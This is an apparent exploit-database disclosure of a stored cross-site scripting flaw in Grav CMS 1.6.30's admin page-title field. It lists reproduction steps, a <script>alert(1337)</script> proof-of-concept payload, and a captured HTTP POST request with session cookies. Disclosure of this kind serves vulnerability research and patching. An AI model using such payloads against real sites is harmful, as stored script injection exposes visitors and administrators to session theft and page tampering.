Grav CMS 1.6.30 Cross Site Scripting

Grav CMS version 1.6.30 with Admin plugin version 1.9.18 suffers from a persistent cross site scripting vulnerability.

MD5 | 8d9d82bfed0719ed510036eb1b28bcae

# Exploit Title: Grav CMS 1.6.30 Admin Plugin 1.9.18 - 'Page Title' Persistent Cross-Site Scripting
# Date: 13-12-2020
# Exploit Author: Sagar Banwa
# Vendor Homepage:
# Software Link:
# Version: Grav v1.6.30 - Admin v1.9.18
# Tested on: Windows 10/Kali Linux
# Contact:

Step to reproduce :

1) log in to the grav-admin panel
2) Go to Pages
3) Click on Add
4) It will ask to Add Page
5) fill the following details as below
Page Title : <script>alert(1337)</script>
Folder Name : sagar_Banwa
Parent Page : /(root)
Page Template : Default
Value : yes
6) click on the Save button
7) now Click on Pages again.
8) your page name will be listed as <script>alert(1337)</script>
9) Now click on the eye button to see the XSS or you can simply go to the XSS will pop-up


POST /grav-admin/admin/pages HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:83.0) Gecko/20100101 Firefox/83.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 230
Connection: close
Cookie: grav-site-a4a23f1-admin=ehrcji8qpnu8e50r839r4oe2on; grav-site-a4a23f1=u5438b49fft2b5d7610a53ne1d; grav-tabs-state={%22tab-options.routes.registration.Security%22:%22data.Security%22%2C%22tab-content.options.advanced%22:%22data.content%22}
Upgrade-Insecure-Requests: 1



Related Posts